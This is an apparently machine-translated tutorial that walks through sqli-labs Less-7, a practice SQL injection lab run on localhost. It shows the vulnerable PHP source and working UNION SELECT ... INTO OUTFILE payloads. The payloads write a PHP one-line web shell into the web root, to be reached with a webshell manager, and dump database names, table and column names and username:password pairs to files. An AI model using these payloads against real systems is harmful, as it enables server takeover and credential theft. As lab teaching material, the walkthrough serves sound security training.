The clearance is entitled dump into outfile, this means that none of our way to make use of the imported files are implanted. In the Background-3 we have learned how to use the dump into file.
First here or go back to the source code. Focus on the processing and sql statement id parameter, you can see from the source code
$id=$_GET['id']; $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; } else { echo '<font color= "#FFFF00">'; echo 'You have an error in your SQL syntax'; //print_r(mysql_error()); echo "</font>"; }
Here the parameters of id ')) is performed.
Here we demonstrate that using the above mentioned imported files:
First, find the absolute path to the directory WEB
http://127.0.0.1/sql/Less-2/?id=-1%20union%20select%201,@@basedir,@@datadir%20--+
Here opportunistic, looking for a simple question Less-2 injected directly into the path to get, easy export.
http://127.0.0.1/sql/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\uuu.txt" %23
Image above sql wrong, but it does not matter, we can see uuu.txt has been generated in the file.
Like the above-mentioned background-3, we can directly imported into a word Trojan.
http://127.0.0.1/sql/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["mima"])?>' into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\test.php" --+
We can see in the file has been imported into a word Trojan
Test.php page views
This time with China knives and other management tools to connect to webshell
May file management, database management, etc.
For example, enter the file manager, you can manage all directories on the server's file
The rest will not repeat them.
There is another train of thought, you can directly query results written to the file, and then access this file.
Note that the file can not be an existing file
Write user library name, version number
http://127.0.0.1/sql/Less-7/?id=-1')) union select user(),database(),version() into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\1.txt" --+
Write the name of the table
http://127.0.0.1/sql/Less-7/?id=-1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\2.txt" --+
Write field names, table, for example to users
http://127.0.0.1/sql/Less-7/?id=-1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\3.txt" --+
Write to users table
http://127.0.0.1/sql/Less-7/?id=-1')) union select 1,2,group_concat(username,0x3a,password) from users into outfile "D:\\software\\wamp\\www\\sql\\Less-7\\4.txt" --+
From: https://www.cnblogs.com/lcamry/p/5763105.html